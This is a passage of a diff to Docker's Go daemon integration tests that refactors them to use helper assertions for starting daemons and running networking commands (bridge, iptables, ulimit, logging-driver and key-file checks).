{ cmdArgs = append(cmdArgs, "--host", fmt.Sprintf("tcp://%s:%s", hostDirective[0], hostDirective[2])) } - if err := s.d.StartWithBusybox(cmdArgs...); err != nil { - c.Fatalf("Could not start daemon with busybox: %v", err) - } + s.d.StartWithBusybox(c, cmdArgs...) for _, hostDirective := range listeningPorts { output, err := s.d.Cmd("run", "-p", fmt.Sprintf("%s:%s:80", hostDirective[1], hostDirective[2]), "busybox", "true") @@ -543,10 +548,8 @@ func (s *DockerDaemonSuite) TestDaemonAllocatesListeningPort(c *check.C) { func (s *DockerDaemonSuite) TestDaemonKeyGeneration(c *check.C) { // TODO: skip or update for Windows daemon os.Remove("/etc/docker/key.json") - if err := s.d.Start(); err != nil { - c.Fatalf("Could not start daemon: %v", err) - } - s.d.Stop() + s.d.Start(c) + s.d.Stop(c) k, err := libtrust.LoadKeyFile("/etc/docker/key.json") if err != nil { @@ -559,49 +562,18 @@ func (s *DockerDaemonSuite) TestDaemonKeyGeneration(c *check.C) { } } -func (s *DockerDaemonSuite) TestDaemonKeyMigration(c *check.C) { - // TODO: skip or update for Windows daemon - os.Remove("/etc/docker/key.json") - k1, err := libtrust.GenerateECP256PrivateKey() - if err != nil { - c.Fatalf("Error generating private key: %s", err) - } - if err := os.MkdirAll(filepath.Join(os.Getenv("HOME"), ".docker"), 0755); err != nil { - c.Fatalf("Error creating .docker directory: %s", err) - } - if err := libtrust.SaveKey(filepath.Join(os.Getenv("HOME"), ".docker", "key.json"), k1); err != nil { - c.Fatalf("Error saving private key: %s", err) - } - - if err := s.d.Start(); err != nil { - c.Fatalf("Could not start daemon: %v", err) - } - s.d.Stop() - - k2, err := libtrust.LoadKeyFile("/etc/docker/key.json") - if err != nil { - c.Fatalf("Error opening key file") - } - if k1.KeyID() != k2.KeyID() { - c.Fatalf("Key not migrated") - } -} - // GH#11320 - verify that the daemon exits on failure properly // Note that this explicitly tests the conflict of {-b,--bridge} and {--bip} options as the means // to get 
a daemon init failure; no other tests for -b/--bip conflict are therefore required func (s *DockerDaemonSuite) TestDaemonExitOnFailure(c *check.C) { //attempt to start daemon with incorrect flags (we know -b and --bip conflict) - if err := s.d.Start("--bridge", "nosuchbridge", "--bip", "1.1.1.1"); err != nil { + if err := s.d.StartWithError("--bridge", "nosuchbridge", "--bip", "1.1.1.1"); err != nil { //verify we got the right error if !strings.Contains(err.Error(), "Daemon exited") { c.Fatalf("Expected daemon not to start, got %v", err) } // look in the log and make sure we got the message that daemon is shutting down - runCmd := exec.Command("grep", "Error starting daemon", s.d.LogFileName()) - if out, _, err := runCommandWithOutput(runCmd); err != nil { - c.Fatalf("Expected 'Error starting daemon' message; but doesn't exist in log: %q, err: %v", out, err) - } + icmd.RunCommand("grep", "Error starting daemon", s.d.LogFileName()).Assert(c, icmd.Success) } else { //if we didn't get an error and the daemon is running, this is a failure c.Fatal("Conflicting options should cause the daemon to error out with a failure") @@ -610,34 +582,28 @@ func (s *DockerDaemonSuite) TestDaemonExitOnFailure(c *check.C) { func (s *DockerDaemonSuite) TestDaemonBridgeExternal(c *check.C) { d := s.d - err := d.Start("--bridge", "nosuchbridge") + err := d.StartWithError("--bridge", "nosuchbridge") c.Assert(err, check.NotNil, check.Commentf("--bridge option with an invalid bridge should cause the daemon to fail")) - defer d.Restart() + defer d.Restart(c) bridgeName := "external-bridge" bridgeIP := "192.169.1.1/24" _, bridgeIPNet, _ := net.ParseCIDR(bridgeIP) - out, err := createInterface(c, "bridge", bridgeName, bridgeIP) - c.Assert(err, check.IsNil, check.Commentf(out)) + createInterface(c, "bridge", bridgeName, bridgeIP) defer deleteInterface(c, bridgeName) - err = d.StartWithBusybox("--bridge", bridgeName) - c.Assert(err, check.IsNil) + d.StartWithBusybox(c, "--bridge", bridgeName) 
ipTablesSearchString := bridgeIPNet.String() - ipTablesCmd := exec.Command("iptables", "-t", "nat", "-nvL") - out, _, err = runCommandWithOutput(ipTablesCmd) - c.Assert(err, check.IsNil) - - c.Assert(strings.Contains(out, ipTablesSearchString), check.Equals, true, - check.Commentf("iptables output should have contained %q, but was %q", - ipTablesSearchString, out)) + icmd.RunCommand("iptables", "-t", "nat", "-nvL").Assert(c, icmd.Expected{ + Out: ipTablesSearchString, + }) _, err = d.Cmd("run", "-d", "--name", "ExtContainer", "busybox", "top") c.Assert(err, check.IsNil) - containerIP := d.findContainerIP("ExtContainer") + containerIP := d.FindContainerIP(c, "ExtContainer") ip := net.ParseIP(containerIP) c.Assert(bridgeIPNet.Contains(ip), check.Equals, true, check.Commentf("Container IP-Address must be in the same subnet range : %s", @@ -647,46 +613,31 @@ func (s *DockerDaemonSuite) TestDaemonBridgeExternal(c *check.C) { func (s *DockerDaemonSuite) TestDaemonBridgeNone(c *check.C) { // start with bridge none d := s.d - err := d.StartWithBusybox("--bridge", "none") - c.Assert(err, check.IsNil) - defer d.Restart() + d.StartWithBusybox(c, "--bridge", "none") + defer d.Restart(c) // verify docker0 iface is not there - out, _, err := runCommandWithOutput(exec.Command("ifconfig", "docker0")) - c.Assert(err, check.NotNil, check.Commentf("docker0 should not be present if daemon started with --bridge=none")) - c.Assert(strings.Contains(out, "Device not found"), check.Equals, true) + icmd.RunCommand("ifconfig", "docker0").Assert(c, icmd.Expected{ + ExitCode: 1, + Error: "exit status 1", + Err: "Device not found", + }) // verify default "bridge" network is not there - out, err = d.Cmd("network", "inspect", "bridge") + out, err := d.Cmd("network", "inspect", "bridge") c.Assert(err, check.NotNil, check.Commentf("\"bridge\" network should not be present if daemon started with --bridge=none")) c.Assert(strings.Contains(out, "No such network"), check.Equals, true) } -func 
createInterface(c *check.C, ifType string, ifName string, ipNet string) (string, error) { - args := []string{"link", "add", "name", ifName, "type", ifType} - ipLinkCmd := exec.Command("ip", args...) - out, _, err := runCommandWithOutput(ipLinkCmd) - if err != nil { - return out, err - } - - ifCfgCmd := exec.Command("ifconfig", ifName, ipNet, "up") - out, _, err = runCommandWithOutput(ifCfgCmd) - return out, err +func createInterface(c *check.C, ifType string, ifName string, ipNet string) { + icmd.RunCommand("ip", "link", "add", "name", ifName, "type", ifType).Assert(c, icmd.Success) + icmd.RunCommand("ifconfig", ifName, ipNet, "up").Assert(c, icmd.Success) } func deleteInterface(c *check.C, ifName string) { - ifCmd := exec.Command("ip", "link", "delete", ifName) - out, _, err := runCommandWithOutput(ifCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - - flushCmd := exec.Command("iptables", "-t", "nat", "--flush") - out, _, err = runCommandWithOutput(flushCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - - flushCmd = exec.Command("iptables", "--flush") - out, _, err = runCommandWithOutput(flushCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) + icmd.RunCommand("ip", "link", "delete", ifName).Assert(c, icmd.Success) + icmd.RunCommand("iptables", "-t", "nat", "--flush").Assert(c, icmd.Success) + icmd.RunCommand("iptables", "--flush").Assert(c, icmd.Success) } func (s *DockerDaemonSuite) TestDaemonBridgeIP(c *check.C) { @@ -707,32 +658,23 @@ func (s *DockerDaemonSuite) TestDaemonBridgeIP(c *check.C) { bridgeIP := "192.169.1.1/24" ip, bridgeIPNet, _ := net.ParseCIDR(bridgeIP) - err := d.StartWithBusybox("--bip", bridgeIP) - c.Assert(err, check.IsNil) - defer d.Restart() + d.StartWithBusybox(c, "--bip", bridgeIP) + defer d.Restart(c) ifconfigSearchString := ip.String() - ifconfigCmd := exec.Command("ifconfig", defaultNetworkBridge) - out, _, _, err := runCommandWithStdoutStderr(ifconfigCmd) - c.Assert(err, check.IsNil) - - c.Assert(strings.Contains(out, 
ifconfigSearchString), check.Equals, true, - check.Commentf("ifconfig output should have contained %q, but was %q", - ifconfigSearchString, out)) + icmd.RunCommand("ifconfig", defaultNetworkBridge).Assert(c, icmd.Expected{ + Out: ifconfigSearchString, + }) ipTablesSearchString := bridgeIPNet.String() - ipTablesCmd := exec.Command("iptables", "-t", "nat", "-nvL") - out, _, err = runCommandWithOutput(ipTablesCmd) - c.Assert(err, check.IsNil) + icmd.RunCommand("iptables", "-t", "nat", "-nvL").Assert(c, icmd.Expected{ + Out: ipTablesSearchString, + }) - c.Assert(strings.Contains(out, ipTablesSearchString), check.Equals, true, - check.Commentf("iptables output should have contained %q, but was %q", - ipTablesSearchString, out)) - - out, err = d.Cmd("run", "-d", "--name", "test", "busybox", "top") + _, err := d.Cmd("run", "-d", "--name", "test", "busybox", "top") c.Assert(err, check.IsNil) - containerIP := d.findContainerIP("test") + containerIP := d.FindContainerIP(c, "test") ip = net.ParseIP(containerIP) c.Assert(bridgeIPNet.Contains(ip), check.Equals, true, check.Commentf("Container IP-Address must be in the same subnet range : %s", @@ -741,38 +683,23 @@ func (s *DockerDaemonSuite) TestDaemonBridgeIP(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonRestartWithBridgeIPChange(c *check.C) { - if err := s.d.Start(); err != nil { - c.Fatalf("Could not start daemon: %v", err) - } - defer s.d.Restart() - if err := s.d.Stop(); err != nil { - c.Fatalf("Could not stop daemon: %v", err) - } + s.d.Start(c) + defer s.d.Restart(c) + s.d.Stop(c) // now we will change the docker0's IP and then try starting the daemon bridgeIP := "192.169.100.1/24" _, bridgeIPNet, _ := net.ParseCIDR(bridgeIP) - ipCmd := exec.Command("ifconfig", "docker0", bridgeIP) - stdout, stderr, _, err := runCommandWithStdoutStderr(ipCmd) - if err != nil { - c.Fatalf("failed to change docker0's IP association: %v, stdout: %q, stderr: %q", err, stdout, stderr) - } + icmd.RunCommand("ifconfig", "docker0", 
bridgeIP).Assert(c, icmd.Success) - if err := s.d.Start("--bip", bridgeIP); err != nil { - c.Fatalf("Could not start daemon: %v", err) - } + s.d.Start(c, "--bip", bridgeIP) //check if the iptables contains new bridgeIP MASQUERADE rule ipTablesSearchString := bridgeIPNet.String() - ipTablesCmd := exec.Command("iptables", "-t", "nat", "-nvL") - out, _, err := runCommandWithOutput(ipTablesCmd) - if err != nil { - c.Fatalf("Could not run iptables -nvL: %s, %v", out, err) - } - if !strings.Contains(out, ipTablesSearchString) { - c.Fatalf("iptables output should have contained new MASQUERADE rule with IP %q, but was %q", ipTablesSearchString, out) - } + icmd.RunCommand("iptables", "-t", "nat", "-nvL").Assert(c, icmd.Expected{ + Out: ipTablesSearchString, + }) } func (s *DockerDaemonSuite) TestDaemonBridgeFixedCidr(c *check.C) { @@ -781,14 +708,12 @@ func (s *DockerDaemonSuite) TestDaemonBridgeFixedCidr(c *check.C) { bridgeName := "external-bridge" bridgeIP := "192.169.1.1/24" - out, err := createInterface(c, "bridge", bridgeName, bridgeIP) - c.Assert(err, check.IsNil, check.Commentf(out)) + createInterface(c, "bridge", bridgeName, bridgeIP) defer deleteInterface(c, bridgeName) args := []string{"--bridge", bridgeName, "--fixed-cidr", "192.169.1.0/30"} - err = d.StartWithBusybox(args...) - c.Assert(err, check.IsNil) - defer d.Restart() + d.StartWithBusybox(c, args...) 
+ defer d.Restart(c) for i := 0; i < 4; i++ { cName := "Container" + strconv.Itoa(i) @@ -806,15 +731,13 @@ func (s *DockerDaemonSuite) TestDaemonBridgeFixedCidr2(c *check.C) { bridgeName := "external-bridge" bridgeIP := "10.2.2.1/16" - out, err := createInterface(c, "bridge", bridgeName, bridgeIP) - c.Assert(err, check.IsNil, check.Commentf(out)) + createInterface(c, "bridge", bridgeName, bridgeIP) defer deleteInterface(c, bridgeName) - err = d.StartWithBusybox("--bip", bridgeIP, "--fixed-cidr", "10.2.2.0/24") - c.Assert(err, check.IsNil) - defer s.d.Restart() + d.StartWithBusybox(c, "--bip", bridgeIP, "--fixed-cidr", "10.2.2.0/24") + defer s.d.Restart(c) - out, err = d.Cmd("run", "-d", "--name", "bb", "busybox", "top") + out, err := d.Cmd("run", "-d", "--name", "bb", "busybox", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) defer d.Cmd("stop", "bb") @@ -832,15 +755,13 @@ func (s *DockerDaemonSuite) TestDaemonBridgeFixedCIDREqualBridgeNetwork(c *check bridgeName := "external-bridge" bridgeIP := "172.27.42.1/16" - out, err := createInterface(c, "bridge", bridgeName, bridgeIP) - c.Assert(err, check.IsNil, check.Commentf(out)) + createInterface(c, "bridge", bridgeName, bridgeIP) defer deleteInterface(c, bridgeName) - err = d.StartWithBusybox("--bridge", bridgeName, "--fixed-cidr", bridgeIP) - c.Assert(err, check.IsNil) - defer s.d.Restart() + d.StartWithBusybox(c, "--bridge", bridgeName, "--fixed-cidr", bridgeIP) + defer s.d.Restart(c) - out, err = d.Cmd("run", "-d", "busybox", "top") + out, err := d.Cmd("run", "-d", "busybox", "top") c.Assert(err, check.IsNil, check.Commentf(out)) cid1 := strings.TrimSpace(out) defer d.Cmd("stop", cid1) @@ -855,12 +776,12 @@ func (s *DockerDaemonSuite) TestDaemonDefaultGatewayIPv4Implicit(c *check.C) { bridgeIP := "192.169.1.1" bridgeIPNet := fmt.Sprintf("%s/24", bridgeIP) - err := d.StartWithBusybox("--bip", bridgeIPNet) - c.Assert(err, check.IsNil) - defer d.Restart() + d.StartWithBusybox(c, "--bip", bridgeIPNet) + defer 
d.Restart(c) expectedMessage := fmt.Sprintf("default via %s dev", bridgeIP) out, err := d.Cmd("run", "busybox", "ip", "-4", "route", "list", "0/0") + c.Assert(err, checker.IsNil) c.Assert(strings.Contains(out, expectedMessage), check.Equals, true, check.Commentf("Implicit default gateway should be bridge IP %s, but default route was '%s'", bridgeIP, strings.TrimSpace(out))) @@ -877,12 +798,12 @@ func (s *DockerDaemonSuite) TestDaemonDefaultGatewayIPv4Explicit(c *check.C) { bridgeIPNet := fmt.Sprintf("%s/24", bridgeIP) gatewayIP := "192.169.1.254" - err := d.StartWithBusybox("--bip", bridgeIPNet, "--default-gateway", gatewayIP) - c.Assert(err, check.IsNil) - defer d.Restart() + d.StartWithBusybox(c, "--bip", bridgeIPNet, "--default-gateway", gatewayIP) + defer d.Restart(c) expectedMessage := fmt.Sprintf("default via %s dev", gatewayIP) out, err := d.Cmd("run", "busybox", "ip", "-4", "route", "list", "0/0") + c.Assert(err, checker.IsNil) c.Assert(strings.Contains(out, expectedMessage), check.Equals, true, check.Commentf("Explicit default gateway should be %s, but default route was '%s'", gatewayIP, strings.TrimSpace(out))) @@ -894,11 +815,10 @@ func (s *DockerDaemonSuite) TestDaemonDefaultGatewayIPv4ExplicitOutsideContainer deleteInterface(c, defaultNetworkBridge) // Program a custom default gateway outside of the container subnet, daemon should accept it and start - err := s.d.StartWithBusybox("--bip", "172.16.0.10/16", "--fixed-cidr", "172.16.1.0/24", "--default-gateway", "172.16.0.254") - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c, "--bip", "172.16.0.10/16", "--fixed-cidr", "172.16.1.0/24", "--default-gateway", "172.16.0.254") deleteInterface(c, defaultNetworkBridge) - s.d.Restart() + s.d.Restart(c) } func (s *DockerDaemonSuite) TestDaemonDefaultNetworkInvalidClusterConfig(c *check.C) { @@ -909,15 +829,13 @@ func (s *DockerDaemonSuite) TestDaemonDefaultNetworkInvalidClusterConfig(c *chec deleteInterface(c, defaultNetworkBridge) discoveryBackend := 
"consul://consuladdr:consulport/some/path" - err := s.d.Start(fmt.Sprintf("--cluster-store=%s", discoveryBackend)) - c.Assert(err, checker.IsNil) + s.d.Start(c, fmt.Sprintf("--cluster-store=%s", discoveryBackend)) // Start daemon with docker0 bridge result := icmd.RunCommand("ifconfig", defaultNetworkBridge) - c.Assert(result, icmd.Matches, icmd.Success) + result.Assert(c, icmd.Success) - err = s.d.Restart(fmt.Sprintf("--cluster-store=%s", discoveryBackend)) - c.Assert(err, checker.IsNil) + s.d.Restart(c, fmt.Sprintf("--cluster-store=%s", discoveryBackend)) } func (s *DockerDaemonSuite) TestDaemonIP(c *check.C) { @@ -926,9 +844,8 @@ func (s *DockerDaemonSuite) TestDaemonIP(c *check.C) { ipStr := "192.170.1.1/24" ip, _, _ := net.ParseCIDR(ipStr) args := []string{"--ip", ip.String()} - err := d.StartWithBusybox(args...) - c.Assert(err, check.IsNil) - defer d.Restart() + d.StartWithBusybox(c, args...) + defer d.Restart(c) out, err := d.Cmd("run", "-d", "-p", "8000:8000", "busybox", "top") c.Assert(err, check.NotNil, @@ -936,21 +853,18 @@ func (s *DockerDaemonSuite) TestDaemonIP(c *check.C) { c.Assert(strings.Contains(out, "Error starting userland proxy"), check.Equals, true) ifName := "dummy" - out, err = createInterface(c, "dummy", ifName, ipStr) - c.Assert(err, check.IsNil, check.Commentf(out)) + createInterface(c, "dummy", ifName, ipStr) defer deleteInterface(c, ifName) _, err = d.Cmd("run", "-d", "-p", "8000:8000", "busybox", "top") c.Assert(err, check.IsNil) - ipTablesCmd := exec.Command("iptables", "-t", "nat", "-nvL") - out, _, err = runCommandWithOutput(ipTablesCmd) - c.Assert(err, check.IsNil) - + result := icmd.RunCommand("iptables", "-t", "nat", "-nvL") + result.Assert(c, icmd.Success) regex := fmt.Sprintf("DNAT.*%s.*dpt:8000", ip.String()) - matched, _ := regexp.MatchString(regex, out) + matched, _ := regexp.MatchString(regex, result.Combined()) c.Assert(matched, check.Equals, true, - check.Commentf("iptables output should have contained %q, but was %q", 
regex, out)) + check.Commentf("iptables output should have contained %q, but was %q", regex, result.Combined())) } func (s *DockerDaemonSuite) TestDaemonICCPing(c *check.C) { @@ -960,23 +874,18 @@ func (s *DockerDaemonSuite) TestDaemonICCPing(c *check.C) { bridgeName := "external-bridge" bridgeIP := "192.169.1.1/24" - out, err := createInterface(c, "bridge", bridgeName, bridgeIP) - c.Assert(err, check.IsNil, check.Commentf(out)) + createInterface(c, "bridge", bridgeName, bridgeIP) defer deleteInterface(c, bridgeName) - args := []string{"--bridge", bridgeName, "--icc=false"} - err = d.StartWithBusybox(args...) - c.Assert(err, check.IsNil) - defer d.Restart() - - ipTablesCmd := exec.Command("iptables", "-nvL", "FORWARD") - out, _, err = runCommandWithOutput(ipTablesCmd) - c.Assert(err, check.IsNil) + d.StartWithBusybox(c, "--bridge", bridgeName, "--icc=false") + defer d.Restart(c) + result := icmd.RunCommand("iptables", "-nvL", "FORWARD") + result.Assert(c, icmd.Success) regex := fmt.Sprintf("DROP.*all.*%s.*%s", bridgeName, bridgeName) - matched, _ := regexp.MatchString(regex, out) + matched, _ := regexp.MatchString(regex, result.Combined()) c.Assert(matched, check.Equals, true, - check.Commentf("iptables output should have contained %q, but was %q", regex, out)) + check.Commentf("iptables output should have contained %q, but was %q", regex, result.Combined())) // Pinging another container must fail with --icc=false pingContainers(c, d, true) @@ -990,7 +899,7 @@ func (s *DockerDaemonSuite) TestDaemonICCPing(c *check.C) { // But, Pinging external or a Host interface must succeed pingCmd := fmt.Sprintf("ping -c 1 %s -W 1", ip.String()) runArgs := []string{"run", "--rm", "busybox", "sh", "-c", pingCmd} - _, err = d.Cmd(runArgs...) + _, err := d.Cmd(runArgs...) 
c.Assert(err, check.IsNil) } @@ -1000,25 +909,20 @@ func (s *DockerDaemonSuite) TestDaemonICCLinkExpose(c *check.C) { bridgeName := "external-bridge" bridgeIP := "192.169.1.1/24" - out, err := createInterface(c, "bridge", bridgeName, bridgeIP) - c.Assert(err, check.IsNil, check.Commentf(out)) + createInterface(c, "bridge", bridgeName, bridgeIP) defer deleteInterface(c, bridgeName) - args := []string{"--bridge", bridgeName, "--icc=false"} - err = d.StartWithBusybox(args...) - c.Assert(err, check.IsNil) - defer d.Restart() - - ipTablesCmd := exec.Command("iptables", "-nvL", "FORWARD") - out, _, err = runCommandWithOutput(ipTablesCmd) - c.Assert(err, check.IsNil) + d.StartWithBusybox(c, "--bridge", bridgeName, "--icc=false") + defer d.Restart(c) + result := icmd.RunCommand("iptables", "-nvL", "FORWARD") + result.Assert(c, icmd.Success) regex := fmt.Sprintf("DROP.*all.*%s.*%s", bridgeName, bridgeName) - matched, _ := regexp.MatchString(regex, out) + matched, _ := regexp.MatchString(regex, result.Combined()) c.Assert(matched, check.Equals, true, - check.Commentf("iptables output should have contained %q, but was %q", regex, out)) + check.Commentf("iptables output should have contained %q, but was %q", regex, result.Combined())) - out, err = d.Cmd("run", "-d", "--expose", "4567", "--name", "icc1", "busybox", "nc", "-l", "-p", "4567") + out, err := d.Cmd("run", "-d", "--expose", "4567", "--name", "icc1", "busybox", "nc", "-l", "-p", "4567") c.Assert(err, check.IsNil, check.Commentf(out)) out, err = d.Cmd("run", "--link", "icc1:icc1", "busybox", "nc", "icc1", "4567") @@ -1029,21 +933,19 @@ func (s *DockerDaemonSuite) TestDaemonLinksIpTablesRulesWhenLinkAndUnlink(c *che bridgeName := "external-bridge" bridgeIP := "192.169.1.1/24" - out, err := createInterface(c, "bridge", bridgeName, bridgeIP) - c.Assert(err, check.IsNil, check.Commentf(out)) + createInterface(c, "bridge", bridgeName, bridgeIP) defer deleteInterface(c, bridgeName) - err = s.d.StartWithBusybox("--bridge", 
bridgeName, "--icc=false") - c.Assert(err, check.IsNil) - defer s.d.Restart() + s.d.StartWithBusybox(c, "--bridge", bridgeName, "--icc=false") + defer s.d.Restart(c) - _, err = s.d.Cmd("run", "-d", "--name", "child", "--publish", "8080:80", "busybox", "top") + _, err := s.d.Cmd("run", "-d", "--name", "child", "--publish", "8080:80", "busybox", "top") c.Assert(err, check.IsNil) _, err = s.d.Cmd("run", "-d", "--name", "parent", "--link", "child:http", "busybox", "top") c.Assert(err, check.IsNil) - childIP := s.d.findContainerIP("child") - parentIP := s.d.findContainerIP("parent") + childIP := s.d.FindContainerIP(c, "child") + parentIP := s.d.FindContainerIP(c, "parent") sourceRule := []string{"-i", bridgeName, "-o", bridgeName, "-p", "tcp", "-s", childIP, "--sport", "80", "-d", parentIP, "-j", "ACCEPT"} destinationRule := []string{"-i", bridgeName, "-o", bridgeName, "-p", "tcp", "-s", parentIP, "--dport", "80", "-d", childIP, "-j", "ACCEPT"} @@ -1063,9 +965,7 @@ func (s *DockerDaemonSuite) TestDaemonLinksIpTablesRulesWhenLinkAndUnlink(c *che func (s *DockerDaemonSuite) TestDaemonUlimitDefaults(c *check.C) { testRequires(c, DaemonIsLinux) - if err := s.d.StartWithBusybox("--default-ulimit", "nofile=42:42", "--default-ulimit", "nproc=1024:1024"); err != nil { - c.Fatal(err) - } + s.d.StartWithBusybox(c, "--default-ulimit", "nofile=42:42", "--default-ulimit", "nproc=1024:1024") out, err := s.d.Cmd("run", "--ulimit", "nproc=2048", "--name=test", "busybox", "/bin/sh", "-c", "echo $(ulimit -n); echo $(ulimit -p)") if err != nil { @@ -1083,13 +983,11 @@ func (s *DockerDaemonSuite) TestDaemonUlimitDefaults(c *check.C) { c.Fatalf("expected `ulimit -n` to be `42`, got: %s", nofile) } if nproc != "2048" { - c.Fatalf("exepcted `ulimit -p` to be 2048, got: %s", nproc) + c.Fatalf("expected `ulimit -p` to be 2048, got: %s", nproc) } // Now restart daemon with a new default - if err := s.d.Restart("--default-ulimit", "nofile=43"); err != nil { - c.Fatal(err) - } + s.d.Restart(c, 
"--default-ulimit", "nofile=43") out, err = s.d.Cmd("start", "-a", "test") if err != nil { @@ -1107,15 +1005,13 @@ func (s *DockerDaemonSuite) TestDaemonUlimitDefaults(c *check.C) { c.Fatalf("expected `ulimit -n` to be `43`, got: %s", nofile) } if nproc != "2048" { - c.Fatalf("exepcted `ulimit -p` to be 2048, got: %s", nproc) + c.Fatalf("expected `ulimit -p` to be 2048, got: %s", nproc) } } // #11315 func (s *DockerDaemonSuite) TestDaemonRestartRenameContainer(c *check.C) { - if err := s.d.StartWithBusybox(); err != nil { - c.Fatal(err) - } + s.d.StartWithBusybox(c) if out, err := s.d.Cmd("run", "--name=test", "busybox"); err != nil { c.Fatal(err, out) @@ -1125,9 +1021,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartRenameContainer(c *check.C) { c.Fatal(err, out) } - if err := s.d.Restart(); err != nil { - c.Fatal(err) - } + s.d.Restart(c) if out, err := s.d.Cmd("start", "test2"); err != nil { c.Fatal(err, out) @@ -1135,16 +1029,14 @@ func (s *DockerDaemonSuite) TestDaemonRestartRenameContainer(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonLoggingDriverDefault(c *check.C) { - if err := s.d.StartWithBusybox(); err != nil { - c.Fatal(err) - } + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "--name=test", "busybox", "echo", "testline") c.Assert(err, check.IsNil, check.Commentf(out)) - id, err := s.d.getIDByName("test") + id, err := s.d.GetIDByName("test") c.Assert(err, check.IsNil) - logPath := filepath.Join(s.d.root, "containers", id, id+"-json.log") + logPath := filepath.Join(s.d.Root, "containers", id, id+"-json.log") if _, err := os.Stat(logPath); err != nil { c.Fatal(err) @@ -1175,18 +1067,16 @@ func (s *DockerDaemonSuite) TestDaemonLoggingDriverDefault(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonLoggingDriverDefaultOverride(c *check.C) { - if err := s.d.StartWithBusybox(); err != nil { - c.Fatal(err) - } + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "--name=test", "--log-driver=none", "busybox", "echo", "testline") if err != nil { 
c.Fatal(out, err) } - id, err := s.d.getIDByName("test") + id, err := s.d.GetIDByName("test") c.Assert(err, check.IsNil) - logPath := filepath.Join(s.d.root, "containers", id, id+"-json.log") + logPath := filepath.Join(s.d.Root, "containers", id, id+"-json.log") if _, err := os.Stat(logPath); err == nil || !os.IsNotExist(err) { c.Fatalf("%s shouldn't exits, error on Stat: %s", logPath, err) @@ -1194,18 +1084,16 @@ func (s *DockerDaemonSuite) TestDaemonLoggingDriverDefaultOverride(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonLoggingDriverNone(c *check.C) { - if err := s.d.StartWithBusybox("--log-driver=none"); err != nil { - c.Fatal(err) - } + s.d.StartWithBusybox(c, "--log-driver=none") out, err := s.d.Cmd("run", "--name=test", "busybox", "echo", "testline") if err != nil { c.Fatal(out, err) } - id, err := s.d.getIDByName("test") + id, err := s.d.GetIDByName("test") c.Assert(err, check.IsNil) - logPath := filepath.Join(s.d.folder, "graph", "containers", id, id+"-json.log") + logPath := filepath.Join(s.d.Root, "containers", id, id+"-json.log") if _, err := os.Stat(logPath); err == nil || !os.IsNotExist(err) { c.Fatalf("%s shouldn't exits, error on Stat: %s", logPath, err) @@ -1213,18 +1101,16 @@ func (s *DockerDaemonSuite) TestDaemonLoggingDriverNone(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonLoggingDriverNoneOverride(c *check.C) { - if err := s.d.StartWithBusybox("--log-driver=none"); err != nil { - c.Fatal(err) - } + s.d.StartWithBusybox(c, "--log-driver=none") out, err := s.d.Cmd("run", "--name=test", "--log-driver=json-file", "busybox", "echo", "testline") if err != nil { c.Fatal(out, err) } - id, err := s.d.getIDByName("test") + id, err := s.d.GetIDByName("test") c.Assert(err, check.IsNil) - logPath := filepath.Join(s.d.root, "containers", id, id+"-json.log") + logPath := filepath.Join(s.d.Root, "containers", id, id+"-json.log") if _, err := os.Stat(logPath); err != nil { c.Fatal(err) @@ -1255,17 +1141,32 @@ func (s *DockerDaemonSuite) 
TestDaemonLoggingDriverNoneOverride(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonLoggingDriverNoneLogsError(c *check.C) { - c.Assert(s.d.StartWithBusybox("--log-driver=none"), checker.IsNil) + s.d.StartWithBusybox(c, "--log-driver=none") out, err := s.d.Cmd("run", "--name=test", "busybox", "echo", "testline") c.Assert(err, checker.IsNil, check.Commentf(out)) out, err = s.d.Cmd("logs", "test") c.Assert(err, check.NotNil, check.Commentf("Logs should fail with 'none' driver")) - expected := `"logs" command is supported only for "json-file" and "journald" logging drivers (got: none)` + expected := `configured logging driver does not support reading` c.Assert(out, checker.Contains, expected) } +func (s *DockerDaemonSuite) TestDaemonLoggingDriverShouldBeIgnoredForBuild(c *check.C) { + s.d.StartWithBusybox(c, "--log-driver=splunk") + + result := cli.BuildCmd(c, "busyboxs", cli.Daemon(s.d), + build.WithDockerfile(` + FROM busybox + RUN echo foo`), + build.WithoutCache, + ) + comment := check.Commentf("Failed to build image. 
output %s, exitCode %d, err %v", result.Combined(), result.ExitCode, result.Error) + c.Assert(result.Error, check.IsNil, comment) + c.Assert(result.ExitCode, check.Equals, 0, comment) + c.Assert(result.Combined(), checker.Contains, "foo", comment) +} + func (s *DockerDaemonSuite) TestDaemonUnixSockCleanedUp(c *check.C) { dir, err := ioutil.TempDir("", "socket-cleanup-test") if err != nil { @@ -1274,17 +1175,13 @@ func (s *DockerDaemonSuite) TestDaemonUnixSockCleanedUp(c *check.C) { defer os.RemoveAll(dir) sockPath := filepath.Join(dir, "docker.sock") - if err := s.d.Start("--host", "unix://"+sockPath); err != nil { - c.Fatal(err) - } + s.d.Start(c, "--host", "unix://"+sockPath) if _, err := os.Stat(sockPath); err != nil { c.Fatal("socket does not exist") } - if err := s.d.Stop(); err != nil { - c.Fatal(err) - } + s.d.Stop(c) if _, err := os.Stat(sockPath); err == nil || !os.IsNotExist(err) { c.Fatal("unix socket is not cleaned up") @@ -1302,13 +1199,8 @@ func (s *DockerDaemonSuite) TestDaemonWithWrongkey(c *check.C) { } os.Remove("/etc/docker/key.json") - if err := s.d.Start(); err != nil { - c.Fatalf("Failed to start daemon: %v", err) - } - - if err := s.d.Stop(); err != nil { - c.Fatalf("Could not stop daemon: %v", err) - } + s.d.Start(c) + s.d.Stop(c) config := &Config{} bytes, err := ioutil.ReadFile("/etc/docker/key.json") @@ -1337,11 +1229,12 @@ func (s *DockerDaemonSuite) TestDaemonWithWrongkey(c *check.C) { defer os.Remove("/etc/docker/key.json") - if err := s.d.Start(); err == nil { + if err := s.d.StartWithError(); err == nil { c.Fatalf("It should not be successful to start daemon with wrong key: %v", err) } - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + content, err := 